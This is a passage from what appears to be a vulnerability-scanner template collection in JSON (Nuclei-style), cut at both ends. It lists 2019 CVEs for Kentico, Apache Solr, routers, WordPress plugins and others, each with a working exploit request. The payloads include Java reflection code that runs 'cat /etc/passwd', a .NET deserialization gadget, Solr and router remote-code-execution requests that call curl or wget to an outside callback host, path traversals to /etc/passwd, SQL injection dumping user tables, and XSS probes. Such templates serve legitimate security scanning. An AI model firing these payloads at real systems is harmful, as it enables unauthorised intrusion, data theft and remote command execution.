};defineClass=2.class.forName('java.lang.Thread');x=defineClass.getDeclaredMethod('currentThread').invoke(null);y=defineClass.getDeclaredMethod('getContextClassLoader').invoke(x);defineClass=2.class.forName('java.lang.ClassLoader').getDeclaredMethod('defineClass','1'.class,1.class.forName('[B'),1.class.forName('[I').getComponentType(),1.class.forName('[I').getComponentType()); \\ndefineClass.setAccessible(true);\\nx=defineClass.invoke(\\n    y,\\n   'Exploit.Test234',\\n    z.getBytes('latin1'),    0,\\n    3054\\n);x.getMethod('test', ''.class).invoke(null, 'cat /etc/passwd');'done!'}\\n\"}, {\"property\": \"type\", \"value\": \"jexl\"}], \"limit\": 50, \"page\": 1}], \"method\": \"previewAssets\"}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-9726","info":{"name":"Homematic CCU3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.%00./.%00./etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","bin:.*:0:0:"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10068","info":{"name":"Kentico CMS Insecure Deserialization Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData"],"body":"stagingTaskData=%3cSOAP-ENV%3aEnvelope%20xmlns%3axsi%3d%22http%3a//www.w3.org/2001/XMLSchema-instance%22%20xmlns%3axsd%3d%22http%3a//www.w3.org/2001/XMLSchema%22%20xmlns%3aSOAP-ENC%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%20xmlns%3aSOAP-ENV%3d%22http%3a//schemas.xmlsoap.org/soap/envelope/%22%20xmlns%3aclr%3d%22http%3a//schemas.microsoft.com/soap/encoding/clr/1.0%22%20SOAP-ENV%3aencodingStyle%3d%22http%3a//schemas.xmlsoap.org/soap/encoding/%22%3e%0a%20%20%3cSOAP-ENV%3aBody%3e%0a%20%20%20%20%3ca1%3aWindowsIdentity%20id%3d%22ref-1%22%20xmlns%3aa1%3d%22http%3a//schemas.microsoft.com/clr/nsassem/System.Security.Principal/mscorlib%2c%20Version%3d4.0.0.0%2c%20Culture%3dneutral%2c%20PublicKeyToken%3db77a5c561934e089%22%3e%0a%20%20%20%20%20%20%3cSystem.Security.ClaimsIdentity.actor%20id%3d%22ref-2%22%20xmlns%3d%22%22%20xsi%3atype%3d%22xsd%3astring%22%3eAAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAACEAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLlNvcnRlZFNldGAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAFQ291bnQIQ29tcGFyZXIHVmVyc2lvbgVJdGVtcwADAAYIjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0IAgAAAAIAAAAJAwAAAAIAAAAJBAAAAAQDAAAAjQFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5Db21wYXJpc29uQ29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0BAAAAC19jb21wYXJpc29uAyJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyCQUAAAARBAAAAAIAAAAGBgAAALoXL2MgZWNobyBUVnFRQUFNQUFBQUVBQUFBLy84QUFMZ0FBQUFBQUFBQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQTZBQUFBQTRmdWc0QXRBbk5JYmdCVE0waFZHaHBjeUJ3Y205bmNtRnRJR05oYm01dmRDQmlaU0J5ZFc0Z2FXNGdSRTlUSUcxdlpHVXVEUTBLSkFBQUFBQUFBQUNUT1BEVzExbWVoZGRabm9YWFdaNkZyRVdTaGROWm5vVlVSWkNGM2xtZWhiaEdsSVhjV1o2RnVFYWFoZFJabm9YWFdaK0ZIbG1laFZSUnc0WGZXWjZGZzNxdWhmOVpub1VRWDVpRjFsbWVoVkpwWTJqWFdaNkZBQUFBQUFBQUFBQUFBQUFBQUFBQUFGQkZBQUJNQVFRQU81UnRTZ0FBQUFBQUFBQUE0QUFQQVFzQkJnQUFzQUFBQUtBQUFBQUFBQUNiaFFBQUFCQUFBQURBQUFBQUFFQUFBQkFBQUFBUUFBQUVBQUFBQUFBQUFBUUFBQUFBQUFBQUFHQUJBQUFRQUFBQUFBQUFBZ0FBQUFBQUVBQUFFQUFBQUFBUUFBQVFBQUFBQUFBQUVBQUFBQUFBQUFBQUFBQUFiTWNBQUhnQUFBQUFVQUVBeUFjQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQU9EQkFBQWNBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBREFBQURnQVFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBTG5SbGVIUUFBQUJtcVFBQUFCQUFBQUN3QUFBQUVBQUFBQUFBQUFBQUFBQUFBQUFBSUFBQVlDNXlaR0YwWVFBQTVnOEFBQURBQUFBQUVBQUFBTUFBQUFBQUFBQUFBQUFBQUFBQUFFQUFBRUF1WkdGMFlRQUFBRnh3QUFBQTBBQUFBRUFBQUFEUUFBQUFBQUFBQUFBQUFBQUFBQUJBQUFEQUxuSnpjbU1BQUFESUJ3QUFBRkFCQUFBUUFBQUFFQUVBQUFBQUFBQUFBQUFBQUFBQVFBQUFRQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUE%2bPiVURU1QJVxock9YVy5iNjQGBwAAAANjbWQEBQAAACJTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyAwAAAAhEZWxlZ2F0ZQdtZXRob2QwB21ldGhvZDEDAwMwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5L1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyL1N5c3RlbS5SZWZsZWN0aW9uLk1lbWJlckluZm9TZXJpYWxpemF0aW9uSG9sZGVyCQgAAAAJCQAAAAkKAAAABAgAAAAwU3lzdGVtLkRlbGVnYXRlU2VyaWFsaXphdGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5BwAAAAR0eXBlCGFzc2VtYmx5BnRhcmdldBJ0YXJnZXRUeXBlQXNzZW1ibHkOdGFyZ2V0VHlwZU5hbWUKbWV0aG9kTmFtZQ1kZWxlZ2F0ZUVudHJ5AQECAQEBAzBTeXN0ZW0uRGVsZWdhdGVTZXJpYWxpemF0aW9uSG9sZGVyK0RlbGVnYXRlRW50cnkGCwAAALACU3lzdGVtLkZ1bmNgM1tbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MsIFN5c3RlbSwgVmVyc2lvbj00LjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQYMAAAAS21zY29ybGliLCBWZXJzaW9uPTQuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OQoGDQAAAElTeXN0ZW0sIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5Bg4AAAAaU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MGDwAAAAVTdGFydAkQAAAABAkAAAAvU3lzdGVtLlJlZmxlY3Rpb24uTWVtYmVySW5mb1NlcmlhbGl6YXRpb25Ib2xkZXIHAAAABE5hbWUMQXNzZW1ibHlOYW1lCUNsYXNzTmFtZQlTaWduYXR1cmUKU2lnbmF0dXJlMgpNZW1iZXJUeXBlEEdlbmVyaWNBcmd1bWVudHMBAQEBAQADCA1TeXN0ZW0uVHlwZVtdCQ8AAAAJDQAAAAkOAAAABhQAAAA%2bU3lzdGVtLkRpYWdub3N0aWNzLlByb2Nlc3MgU3RhcnQoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGFQAAAD5TeXN0ZW0uRGlhZ25vc3RpY3MuUHJvY2VzcyBTdGFydChTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKAQoAAAAJAAAABhYAAAAHQ29tcGFyZQkMAAAABhgAAAANU3lzdGVtLlN0cmluZwYZAAAAK0ludDMyIENvbXBhcmUoU3lzdGVtLlN0cmluZywgU3lzdGVtLlN0cmluZykGGgAAADJTeXN0ZW0uSW50MzIgQ29tcGFyZShTeXN0ZW0uU3RyaW5nLCBTeXN0ZW0uU3RyaW5nKQgAAAAKARAAAAAIAAAABhsAAABxU3lzdGVtLkNvbXBhcmlzb25gMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0JDAAAAAoJDAAAAAkYAAAACRYAAAAKCw%3d%3d%3c/System.Security.ClaimsIdentity.actor%3e%0a%20%20%20%20%3c/a1%3aWindowsIdentity%3e%0a%20%20%3c/SOAP-ENV%3aBody%3e%0a%3c/SOAP-ENV%3aEnvelope%3e","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["System.InvalidCastException","System.Web.Services.Protocols.SoapException"],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2019-17538","info":{"name":"Jiangnan Online Judge 0.8.0 - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-20210","info":{"name":"WordPress CTHthemes - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?search_term=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&location_search=&nearby=off&address_lat=&address_lng=&distance=10&lcats%5B%5D="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","/wp-content/themes/citybook"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-8390","info":{"name":"qdPM 9.1 - Cross-site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php/login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogin%5B_csrf_token%5D={{csrf}}&login%5Bemail%5D={{username}}&login%5Bpassword%5D={{password}}&http_referer=\n","POST /index.php/users HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nsearch[keywords]=e\"><script>alert(document.domain)</script>&search_by_extrafields[]=9\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","alert alert-info alert-search-result"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["name=\"login\\[_csrf_token\\]\" value=\"(.*?)\""],"internal":true,"part":"body"}]}]},{"id":"CVE-2019-17558","info":{"name":"Apache Solr <=8.3.1 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /solr/admin/cores?wt=json HTTP/1.1\nHost: {{Hostname}}\n","POST /solr/{{core}}/config HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n    \"update-queryresponsewriter\": {\n      \"startup\": \"lazy\",\n      \"name\": \"velocity\",\n      \"class\": \"solr.VelocityResponseWriter\",\n      \"template.base.dir\": \"\",\n      \"solr.resource.loader.enabled\": \"true\",\n      \"params.resource.loader.enabled\": \"true\"\n    }\n}\n","GET /solr/{{core}}/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27curl%20{{interactsh-url}}%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1\nHost: {{Hostname}}\nConnection: close\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"core","group":1,"regex":["\"name\"\\:\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2019-5127","info":{"name":"YouPHPTube Encoder 2.3 - Remote Command Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/objects/getImage.php?base64Url={{base64(encode)}}=&format=png","{{BaseURL}}/objects/getImageMP4.php?base64Url={{base64(encode)}}=&format=jpg","{{BaseURL}}/objects/getSpiritsFromVideo.php?base64Url={{base64(encode)}}=&format=jpg"],"headers":{"Content-Type":"application/x-www-form-urlencoded"}},{"method":"GET","path":["{{BaseURL}}/objects/{{filename}}.txt"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["uid=","gid=","groups="],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-12314","info":{"name":"Deltek Maconomy 2.2.5 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-6715","info":{"name":"W3 Total Cache 0.9.2.6-0.9.3 - Unauthenticated File Read / Directory Traversal","severity":"high"},"requests":[{"raw":["PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n{\"Type\":\"SubscriptionConfirmation\",\"Message\":\"\",\"SubscribeURL\":\"https://rfi.nessus.org/rfi.txt\"}\n"],"matchers":[{"type":"word","part":"body","words":["TmVzc3VzQ29kZUV4ZWNUZXN0"]}]}]},{"id":"CVE-2019-20085","info":{"name":"TVT NVMS 1000 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["\\[(font|extension|file)s\\]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-10692","info":{"name":"WordPress Google Maps <7.11.18 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/?rest_route=/wpgmza/v1/markers&filter=%7b%7d&fields=%2a%20from%20wp_users--%20-"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"user_login\"","\"user_pass\"","\"user_nicename\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-1943","info":{"name":"Cisco Small Business 200,300 and 500 Series Switches - Open Redirect","severity":"medium"},"requests":[{"raw":["GET / HTTP/1.1\nHost: interact.sh\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"server","words":["GoAhead-Webs"]},{"type":"regex","part":"header","regex":["(?i)Location:\\shttps?:\\/\\/interact\\.sh/cs[\\w]+/"]},{"type":"status","status":[302]}]}]},{"id":"CVE-2019-0193","info":{"name":"Apache Solr DataImportHandler <8.2.0 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /solr/admin/cores?wt=json HTTP/1.1\nHost: {{Hostname}}\nAccept-Language: en\nConnection: close\n","POST /solr/{{core}}/dataimport?indent=on&wt=json HTTP/1.1\nHost: {{Hostname}}\nContent-type: application/x-www-form-urlencoded\nX-Requested-With: XMLHttpRequest\n\ncommand=full-import&verbose=false&clean=false&commit=true&debug=true&core=test&dataConfig=%3CdataConfig%3E%0A++%3CdataSource+type%3D%22URLDataSource%22%2F%3E%0A++%3Cscript%3E%3C!%5BCDATA%5B%0A++++++++++function+poc()%7B+java.lang.Runtime.getRuntime().exec(%22curl%20{{interactsh-url}}%22)%3B%0A++++++++++%7D%0A++%5D%5D%3E%3C%2Fscript%3E%0A++%3Cdocument%3E%0A++++%3Centity+name%3D%22stackoverflow%22%0A++++++++++++url%3D%22https%3A%2F%2Fstackoverflow.com%2Ffeeds%2Ftag%2Fsolr%22%0A++++++++++++processor%3D%22XPathEntityProcessor%22%0A++++++++++++forEach%3D%22%2Ffeed%22%0A++++++++++++transformer%3D%22script%3Apoc%22+%2F%3E%0A++%3C%2Fdocument%3E%0A%3C%2FdataConfig%3E&name=dataimport\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}],"extractors":[{"type":"regex","name":"core","group":1,"regex":["\"name\"\\:\"(.*?)\""],"internal":true}]}]},{"id":"CVE-2019-11370","info":{"name":"Carel pCOWeb <B1.2.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /config/pw_snmp_done.html HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n%3Fscript%3Asetdb%28%27snmp%27%2C%27syscontact%27%29=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\n","GET /config/pw_snmp.html HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_2, \"text/html\")","status_code_2 == 200","contains(body_2, 'value=\\\"\\\"><script>alert(document.domain)</script>\\\"></td>')"],"condition":"and"}]}]},{"id":"CVE-2019-3402","info":{"name":"Jira < 8.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'<script>alert(1)</script>' does not exist"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-1653","info":{"name":"Cisco Small Business WAN VPN Routers - Sensitive Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/config.exp"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["sysconfig"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-13462","info":{"name":"Lansweeper Unauthenticated SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/WidgetHandler.ashx?MethodName=Sort&ID=1&row=1&column=%28SELECT%20CONCAT%28CONCAT%28CHAR%28126%29%2C%28SELECT%20SUBSTRING%28%28ISNULL%28CAST%28db_name%28%29%20AS%20NVARCHAR%284000%29%29%2CCHAR%2832%29%29%29%2C1%2C1024%29%29%29%2CCHAR%28126%29%29%29"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["~lansweeperdb~"]},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2019-14974","info":{"name":"SugarCRM Enterprise 9.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/mobile/error-not-supported-platform.html?desktop_url=javascript:alert(1337);//itms://"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["url = window.location.search.split(\"?desktop_url=\")[1]"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-15859","info":{"name":"Socomec DIRIS A-40 Devices Password Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/password.jsn"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/json"]},{"type":"word","part":"body","words":["username","password"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-19824","info":{"name":"TOTOLINK Realtek SD Routers - Remote Command Injection","severity":"high"},"requests":[{"raw":["POST /boafrm/formSysCmd HTTP/1.1\nHost: {{Hostname}}\nAuthorization: Basic YWRtaW46cGFzc3dvcmQ=\nContent-Type: application/x-www-form-urlencoded\n\nsubmit-url=%2Fsyscmd.htm&sysCmdselect=5&sysCmdselects=0&save_apply=Run+Command&sysCmd=wget+http://{{interactsh-url}}\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2019-17418","info":{"name":"MetInfo 7.0.0 beta - SQL Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/?n=language&c=language_general&a=doSearchParameter&editor=cn&word=search&appno=0+union+select+98989*443131,1--+&site=admin"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["43865094559"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2019-13396","info":{"name":"FlightPath - Local File Inclusion","severity":"medium"},"requests":[{"raw":["GET /login HTTP/1.1\nHost: {{Hostname}}\n","POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json, text/plain, */*\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\ncallback=system_login_form&form_token={{token}}&form_include=../../../../../../../../../etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"token","group":1,"regex":["idden' name='form_token' value='([a-z0-9]+)'>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2019-16313","info":{"name":"ifw8 Router ROM v4.31 - Credential Discovery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/action/usermanager.htm"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["<td class=\"pwd\" data=\"([a-z]+)\">\\*\\*\\*\\*\\*\\*<\\/td>"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["<td class=\"pwd\" data=\"([a-z]+)\">\\*\\*\\*\\*\\*\\*<\\/td>"],"part":"body"}]}]},{"id":"CVE-2019-14223","info":{"name":"Alfresco Share - Open 